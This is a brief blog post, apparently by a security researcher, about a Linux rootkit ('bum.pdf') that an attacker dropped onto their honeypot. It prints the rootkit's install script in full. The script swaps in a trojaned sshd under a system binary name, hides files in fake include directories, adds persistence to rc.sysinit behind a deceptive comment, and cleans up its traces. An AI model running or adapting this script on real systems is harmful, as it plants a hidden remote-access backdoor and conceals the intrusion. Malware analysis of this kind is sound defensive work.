Linux Rootkit "bum.pdf" dropped onto my Honeypot Today

A malicious user from Romania using Putty dropped off a Linux rootkit on my honeypot today.

From my initial analysis it appears that the honeypot installs a hidden SSH server running on port 10001.

I haven't had much time to look through the entire package but if you'd like to browse what was dropped off I have uploaded everything to CaffSec-Malware-Analysis.

If you find anything interesting please free to post a comment.

UPDATE: I have found a related article on talking about a backdoor installed on port 10001.  Read the article here:

Here is the install script for the main payload.  Interesting stuff!

unset history
mv /lib/
chattr -suia /usr/sbin/zdump
rm -rf /usr/sbin/zdump
mv sshd /usr/sbin/zdump
chattr +suia /usr/sbin/zdump
mkdir -p /usr/include/X11/.swap/
tar xvfz pic.tar.gz -C /usr/include/X11/.swap/ >>/dev/null
mkdir -p /usr/include/sound
mv /usr/include/sound/
mv sounds.h /usr/include/sound/
chmod 770 /usr/include/sound/sounds.h
echo "# Now that we have all of our basic modules loaded and the kernel going,">>/etc/rc.sysinit
echo "# let's dump the syslog ring somewhere so we can find it later" >>/etc/rc.sysinit
echo "/usr/include/sound/sounds.h" >>/etc/rc.sysinit
sleep 10
echo "Enjoy your new box on port 10001"
cd ..
rm -rf rks*

No comments:

Post a Comment